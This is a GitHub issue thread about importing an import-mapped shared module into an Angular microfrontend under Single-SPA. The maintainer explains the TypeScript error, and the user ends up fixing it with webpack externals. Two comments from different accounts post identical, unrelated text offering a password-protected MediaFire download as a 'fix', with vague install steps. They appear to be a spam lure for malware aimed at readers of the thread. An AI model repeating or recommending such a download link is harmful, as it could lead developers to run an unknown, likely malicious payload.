### ISSUE TITLE
 Unable to Import Variables from Shared Utility Module

### ISSUE THREAD

**Issue by Simran-Mudaliar** [filoxo/single-spa-example-rxjs-shared-state#11]
Hi, I'm building a microfrontend application using Single-SPA with four micro apps: a Layout app for navigation and the header, a Home app for the dashboard, a Secrets app for core services, and a LoginPortalApi app for handling token generation (which also serves as a shared utility module). I'm encountering an issue when trying to `import { auth$ } from '@org/LoginPortalApi'`, in Secrets micro app (angular app) resulting in the error `Cannot find module '@org/LoginPortalApi' or its corresponding type declarations.`

In the root app's `index.ejs`, I added the following to the import map:
```json
"@org/LoginPortalApi": "http://localhost:4505/org-LoginPortalApi.js"
```
I also verified that the `org-LoginPortalApi.js` file is loaded properly by adding a `console.log` statement, which appears in the developer console. Despite this, other apps are unable to recognize the module. I'm not sure what I'm missing. Can you help?

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by filoxo** [comment]
This is a TypeScript error, and TypeScript looks at the packages installed in that microfrontend's `package.json`. You need to install the package or corresponding types (even if you're using import-maps). 

See also https://stackoverflow.com/a/66401623/2554793

**Comment by Simran-Mudaliar** [comment]
I tried the following steps to resolve the issue:

1. **Created a Type Declaration File**: In the Secrets App, where I need to access the shared variable, I added a file named `@org__LoginPortalApi.d.ts` with the following content:

   ```typescript
   declare module '@org/LoginPortalApi' {
       import { BehaviorSubject } from 'rxjs';

       export const auth$: BehaviorSubject<any>;

       export function publicApiFunction(): void;
   }
   ```

2. **Updated `tsconfig.json`**: I modified the `tsconfig.json` file to include the custom types:

   ```json
   "compilerOptions": {
       "typeRoots": ["node_modules/@types", "src/types"]
   }
   ```

Despite these changes, I'm still encountering the same error when running the app.

**Comment by Simran-Mudaliar** [comment]
I got it working!

I needed to add the following line to the `extra-webpack.config.js` file in my Secrets App:

```javascript
config.externals = ["rxjs", "@org/LoginPortalApi"];
const singleSpaWebpackConfig = singleSpaAngularWebpack(config, options);
```

Thanks for the quick response and support!

Could you please close this GitHub issue? Thanks!
